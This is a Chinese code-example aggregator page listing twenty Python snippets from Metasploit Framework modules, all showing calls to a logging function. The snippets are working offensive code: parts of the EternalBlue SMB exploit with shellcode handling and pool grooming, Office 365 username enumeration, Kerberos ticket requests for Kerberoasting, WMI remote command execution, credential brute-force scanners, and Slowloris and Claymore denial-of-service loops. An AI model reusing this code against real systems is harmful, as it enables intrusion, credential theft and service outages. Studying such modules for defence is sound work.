本文整理汇总了Python中metasploit.module.log函数的典型用法代码示例。如果您正苦于以下问题:Python log函数的具体用法?Python log怎么用?Python log使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了log函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: run
def run(args):
if dependencies_missing:
module.log('Python requests module missing, cannot continue', level='error')
return
scanner = login_scanner.make_scanner(
lambda host, rport, username, password: valid_login(host, rport, username, password))
scanner(args)
开发者ID:OJ,项目名称:metasploit-framework,代码行数:7,代码来源:onion_omega2_login.py
示例2: check_user
def check_user(url, user, password, timeout):
"""Exploit the difference in HTTP responses from the ActiveSync service to identify valid and invalid usernames.
It was also identified that valid accounts with 2FA enabled can be distinguished from valid accounts without 2FA."""
headers = {"MS-ASProtocolVersion": "14.0"}
auth = (user, password)
try:
r = requests.options(url, headers=headers, auth=auth, timeout=timeout)
except Exception as e:
msg = "error checking {} : {}".format(user, e)
if MSF:
module.log(msg, "error")
else:
logging.error(msg)
return user, UNKNOWN, None
status = r.status_code
if status == 401:
return user, password, VALID_USER, r
elif status == 404:
if r.headers.get("X-CasErrorCode") == "UserNotFound":
return user, password, INVALID_USER, r
elif status == 403:
return user, VALID_PASSWD_2FA, r
elif status == 200:
return user, password, VALID_LOGIN, r
return user, password, UNKNOWN, r
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:25,代码来源:office365userenum.py
示例3: exploit
def exploit(args):
if dependencies_missing:
module.log('Module dependencies (impacket) missing, cannot continue', 'error')
return
# XXX: Normalize strings to ints and unset options to empty strings
rport = int(args['RPORT'])
numGroomConn = int(args['GroomAllocations'])
smbuser = args['SMBUser'] if 'SMBUser' in args else ''
smbpass = args['SMBPass'] if 'SMBPass' in args else ''
# XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload
sc = eternalblue_kshellcode_x64 + b64decode(args['payload_encoded'])
if len(sc) > 0xe80:
module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')
sys.exit()
# Now, shellcode is known. create a feaList
feaList = createFeaList(len(sc))
module.log('shellcode size: {:d}'.format(len(sc)))
module.log('numGroomConn: {:d}'.format(numGroomConn))
_exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)
module.log('done')
开发者ID:l50,项目名称:metasploit-framework,代码行数:26,代码来源:ms17_010_eternalblue_win8.py
示例4: report
def report(out_q, output_file):
"""Thread worker function. Output to terminal and file."""
msf_template = "{code} {valid} {user}:{password}"
template = "[{s}] {code} {valid} {user}:{password}"
symbols = {
VALID_USER: "+",
INVALID_USER: "-",
VALID_PASSWD_2FA: "#",
VALID_LOGIN: "!",
UNKNOWN: "?"
}
while not SHUTDOWN_EVENT.is_set():
try:
result = out_q.get()
except queue.Empty as e:
msg = "report: out_q empty"
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
continue
if result == DIE:
out_q.task_done()
msg = "report thread dying."
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
break
else:
user, password, valid, r = result
if r is None:
code = "???"
else:
code = r.status_code
s = symbols.get(valid)
output = template.format(s=s, code=code, valid=valid, user=user, password=password)
if MSF:
msf_output = msf_template.format(code=code, valid=valid, user=user, password=password)
msf_reporters = {
VALID_USER: module.report_wrong_password,
VALID_PASSWD_2FA: module.report_correct_password,
VALID_LOGIN: module.report_correct_password
}
module.log(msf_output, "debug")
msf_reporter = msf_reporters.get(valid)
if msf_reporter is not None:
msf_reporter(user, password)
if valid in [VALID_LOGIN, VALID_PASSWD_2FA, VALID_USER]:
module.log(msf_output, "good")
else:
module.log(msf_output, "error")
else:
logging.info(output)
if output_file:
with open(output_file, "a", 1) as f:
f.write("{}\n".format(output))
out_q.task_done()
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:59,代码来源:office365userenum.py
示例5: run
def run(args):
if dependencies_missing:
module.log('Module dependencies (impacket, pyasn1, pyOpenSSL) missing, cannot continue', level='error')
return
options = {}
options['dc_ip'] = args['rhost']
executer = GetUserSPNs(args['user'], args['pass'], args['domain'], options)
executer.run()
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:9,代码来源:get_user_spns.py
示例6: run
def run(args):
if dependencies_missing:
module.log('Module dependencies (impacket) missing, cannot continue', level='error')
return
_msf_impacket.pre_run_hook(args)
executer = WMIEXEC(args['COMMAND'], args['SMBUser'], args['SMBPass'], args['SMBDomain'],
share='ADMIN$', noOutput=args['OUTPUT'] != 'true')
executer.run(args['rhost'])
开发者ID:0stvind,项目名称:metasploit-framework,代码行数:9,代码来源:wmiexec.py
示例7: run
def run(args):
if dependencies_missing:
module.log('Python Teradata module missing, cannot continue', level=error)
return
# Define UdaExec ODBC connection "application" globally, must be before LogHandler
udaExec = teradata.UdaExec(appName="Auth", version="1.0", logConsole=False, configureLogging=False)
module.LogHandler.setup(msg_prefix='{}:{} - '.format(args['rhost'], 1025))
scanner = login_scanner.make_scanner(lambda host, port, username, password: valid_login(udaExec, host, username, password))
scanner(args)
开发者ID:0stvind,项目名称:metasploit-framework,代码行数:10,代码来源:teradata_odbc_login.py
示例8: main
def main(args):
"""Setup worker threads and handle shutdown."""
user_file = args['users']
output_file = args['output']
url = args['url']
password = args['password']
max_threads = args['threads']
timeout = args['timeout']
threads = []
meta_threads = []
max_size = max_threads / 2
if max_size < 1:
max_size = 1
in_q = queue.Queue(maxsize=max_size)
out_q = queue.Queue(maxsize=max_size)
try:
report_thread = threading.Thread(name="Thread-report", target=report, args=(out_q, output_file))
report_thread.start()
meta_threads.append(report_thread)
file_thread = threading.Thread(name="Thread-inputfile", target=get_users, args=(user_file, in_q, max_threads))
file_thread.start()
meta_threads.append(file_thread)
for num in range(max_threads):
t = threading.Thread(name="Thread-worker{}".format(num), target=check_users,
args=(in_q, out_q, url, password, timeout))
t.start()
threads.append(t)
for thread in threads:
while thread.is_alive():
thread.join(timeout=0.1)
out_q.put(DIE)
for thread in meta_threads:
while thread.is_alive():
thread.join(timeout=0.1)
except KeyboardInterrupt as e:
msg = "Received KeyboardInterrupt - shutting down"
if MSF:
module.log(msg, "critical")
else:
logging.critical(msg)
SHUTDOWN_EVENT.set()
for thread in threads:
while thread.is_alive():
thread.join(timeout=0.1)
out_q.put(DIE)
for thread in meta_threads:
while thread.is_alive():
thread.join(timeout=0.1)
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:55,代码来源:office365userenum.py
示例9: run
def run(args):
"""Metasploit callback.
Convert args to lowercase for internal compatibility."""
if dependencies_missing:
module.log("Module dependency (requests) is missing, cannot continue")
return
args['TIMEOUT'] = float(args['TIMEOUT'])
args['THREADS'] = int(args['THREADS'])
lower_args = {}
for arg in args:
lower_args[arg.lower()] = args[arg]
main(lower_args)
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:12,代码来源:office365userenum.py
示例10: run_scanner
async def run_scanner(payload, pattern, args, onmatch, **timeouts):
probes = [probe_host(host, int(args['rport']), payload, **timeouts) for host in args['rhosts']]
async for (target, res) in Scan(probes):
if isinstance(res, Exception):
module.log('{}:{} - Error connecting: {}'.format(*target, res), level='error')
elif res and re.search(pattern, res):
module.log('{}:{} - Matches'.format(*target), level='good')
module.log('{}:{} - Matches with: {}'.format(*target, res), level='debug')
onmatch(target, res)
else:
module.log('{}:{} - Does not match'.format(*target), level='info')
module.log('{}:{} - Does not match with: {}'.format(*target, res), level='debug')
开发者ID:0stvind,项目名称:metasploit-framework,代码行数:12,代码来源:probe_scanner.py
示例11: run
def run(args):
host = args['rhost']
port = int(args['rport'])
module.log("Creating sockets...", 'info')
exp = json.dumps({'id': 1, 'jsonrpc': '1.0', 'method': '%n'}).encode()
try:
s = socket.create_connection((host, port), 10)
s.send(exp)
s.close()
except socket.error:
module.log("connect error exit")
开发者ID:KiloMaster,项目名称:metasploit-framework,代码行数:12,代码来源:claymore_dos.py
示例12: valid_login
def valid_login(host, rport, username, password):
payload = {
"jsonrpc": "2.0", "id": 0, "method": "call", "params": ["0" * 32, "session", "login",
{
"username": username,
"password": password
}]}
url = 'http://' + str(host) + ':' + str(rport) + '/ubus'
session = requests.Session()
try:
request = session.post(url, json=payload)
response = json.loads(request.text)
if response['result'][0] != 6 and len(response['result']) > 1:
ubus_rpc_session = response['result'][1]['ubus_rpc_session']
module.log('Ubus RPC Session: ' + ubus_rpc_session, level='good')
else:
return False
except requests.exceptions.ConnectionError:
module.log("Unhandled exception: ConnectionError", level='error')
return False
except ValueError:
module.log("Unhandled exception: Response JSON DecodeError", level='error')
return False
except KeyError:
module.log("Unhandled exception: Dictionary KerError in Response", level='error')
return False
else:
return True
开发者ID:OJ,项目名称:metasploit-framework,代码行数:28,代码来源:onion_omega2_login.py
示例13: get_users
def get_users(user_file, in_q, max_threads):
"""Thread worker function. Load candidate usernames from file into input queue."""
with open(user_file, "r") as f:
for line in f:
if SHUTDOWN_EVENT.is_set():
break
user = line.strip()
msg = "user = {}".format(user)
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
in_q.put(user)
for _ in range(max_threads):
in_q.put(DIE)
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:15,代码来源:office365userenum.py
示例14: sendEcho
def sendEcho(conn, tid, data):
pkt = smb.NewSMBPacket()
pkt['Tid'] = tid
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
transCommand['Parameters'] = smb.SMBEcho_Parameters()
transCommand['Data'] = smb.SMBEcho_Data()
transCommand['Parameters']['EchoCount'] = 1
transCommand['Data']['Data'] = data
pkt.addCommand(transCommand)
conn.sendSMB(pkt)
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() == 0:
module.log('got good ECHO response')
else:
module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')
开发者ID:0stvind,项目名称:metasploit-framework,代码行数:18,代码来源:ms17_010_eternalblue_win8.py
示例15: check_users
def check_users(in_q, out_q, url, password, timeout):
"""Thread worker function which retrieves candidate username from input queue runs the check_user function and
outputs the result to the output queue."""
while not SHUTDOWN_EVENT.is_set():
try:
user = in_q.get()
except queue.Empty as e:
msg = "check_users: in_q empty"
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
continue
if user == DIE:
in_q.task_done()
msg = "check_users thread dying"
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
break
else:
msg = "checking: {}".format(user)
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
try:
result = check_user(url, user, password, timeout)
except Exception as e:
msg = "Error checking {} : {}".format(user, e)
if MSF:
module.log(msg, "error")
else:
logging.error(msg)
in_q.task_done()
continue
msg = "{}".format(result)
if MSF:
module.log(msg, "debug")
else:
logging.debug(msg)
out_q.put(result)
in_q.task_done()
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:44,代码来源:office365userenum.py
示例16: check_banner
def check_banner(args):
module.log('{}:{} Starting banner check for Haraka < 2.8.9'.format(args['rhost'], args['rport']), level='debug')
c = smtplib.SMTP()
(code, banner) = c.connect(args['rhost'], int(args['rport']))
c.quit()
if code == 220 and 'Haraka' in banner:
versions = re.findall('(\d+\.\d+\.\d+)', banner)
if versions:
if StrictVersion(versions[0]) < StrictVersion('2.8.9'):
return 'appears'
else:
return 'safe'
else:
return 'detected'
elif code == 220:
return 'detected'
else:
return 'unknown'
开发者ID:l50,项目名称:metasploit-framework,代码行数:19,代码来源:haraka.py
示例17: getTGT
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
pass
else:
domain = self.__domain
principal = 'krbtgt/%[email protected]%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
module.log('Using TGT from cache', level='debug')
return TGT
else:
module.log('No valid credentials found in cache', level='debug')
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
# In order to maximize the probability of getting session tickets with RC4 etype, we will convert the
# password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the
# cleartext password.
# If no clear text password is provided, we just go with the defaults.
try:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,
compute_lmhash(password),
compute_nthash(password), self.__aesKey,
kdcHost=self.__kdcHost)
except Exception, e:
module.log('Exception for getKerberosTGT', level='error')
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
开发者ID:AmesianX,项目名称:metasploit-framework,代码行数:34,代码来源:get_user_spns.py
示例18: run_scanner
def run_scanner(args, login_callback):
userpass = args['userpass']
rhost = args['rhost']
rport = int(args['rport'])
sleep_interval = float(args['sleep_interval'])
if isinstance(userpass, str):
userpass = [ attempt.split(' ', 1) for attempt in userpass.splitlines() ]
curr = 0
total = len(userpass)
pad_to = len(str(total))
for [username, password] in userpass:
try:
# Call per-combo login function
curr += 1
if login_callback(rhost, rport, username, password):
module.log('{}:{} - [{:>{pad_to}}/{}] - {}:{} - Success'
.format(rhost, rport, curr, total, username, password, pad_to=pad_to), level='good')
module.report_correct_password(username, password)
else:
module.log('{}:{} - [{:>{pad_to}}/{}] - {}:{} - Failure'
.format(rhost, rport, curr, total, username, password, pad_to=pad_to), level='info')
module.report_wrong_password(username, password)
time.sleep(sleep_interval)
except Exception as e:
module.log('{}:{} - [{:>{pad_to}}/{}] - {}:{} - Error: {}'
.format(rhost, rport, curr, total, username, password, e, pad_to=pad_to), level='error')
开发者ID:dougsko,项目名称:metasploit-framework,代码行数:30,代码来源:login_scanner.py
示例19: createSessionAllocNonPaged
def createSessionAllocNonPaged(target, port, size, username, password):
conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set
_, flags2 = conn.get_flags()
# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
if size >= 0xffff:
flags2 &= ~smb.SMB.FLAGS2_UNICODE
reqSize = size // 2
else:
flags2 |= smb.SMB.FLAGS2_UNICODE
reqSize = size
conn.set_flags(flags2=flags2)
pkt = smb.NewSMBPacket()
sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size
sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value
sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 0 for NULL session
sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS
sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
pkt.addCommand(sessionSetup)
conn.sendSMB(pkt)
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() == 0:
module.log('SMB1 session setup allocate nonpaged pool success')
return conn
if username:
# Try login with valid user because anonymous user might get access denied on Windows Server 2012.
# Note: If target allows only NTLMv2 authentication, the login will always fail.
# support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)
flags2 &= ~smb.SMB.FLAGS2_UNICODE
reqSize = size // 2
conn.set_flags(flags2=flags2)
# new SMB packet to reset flags
pkt = smb.NewSMBPacket()
pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))
# UnicodePasswordLen field is in Reserved for extended security format.
sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)
sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\x00'*16
pkt.addCommand(sessionSetup)
conn.sendSMB(pkt)
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() == 0:
module.log('SMB1 session setup allocate nonpaged pool success')
return conn
# lazy to check error code, just print fail message
module.log('SMB1 session setup allocate nonpaged pool failed', 'error')
sys.exit(1)
开发者ID:0stvind,项目名称:metasploit-framework,代码行数:58,代码来源:ms17_010_eternalblue_win8.py
示例20: run
def run(args):
host = args['rhost']
port = int(args['rport'])
use_ssl = args['ssl'] == "true"
rand_user_agent = args['rand_user_agent'] == "true"
socket_count = int(args['sockets'])
delay = int(args['delay'])
module.log("Attacking %s with %s sockets" % (host, socket_count), 'info')
module.log("Creating sockets...", 'info')
for i in range(socket_count):
try:
module.log("Creating socket number %s" % i, 'debug')
s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
except socket.error:
break
list_of_sockets.append(s)
while True:
module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info')
for s in list(list_of_sockets):
try:
s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)),
random.randint(1, 5000)).encode("utf-8"))
except socket.error:
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
module.log("Recreating socket...", 'debug')
try:
s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
if s:
list_of_sockets.append(s)
except socket.error:
break
time.sleep(delay)
开发者ID:0stvind,项目名称:metasploit-framework,代码行数:38,代码来源:slowloris.py
注:本文中的metasploit.module.log函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
客服电话
APP下载
官方微信
请发表评论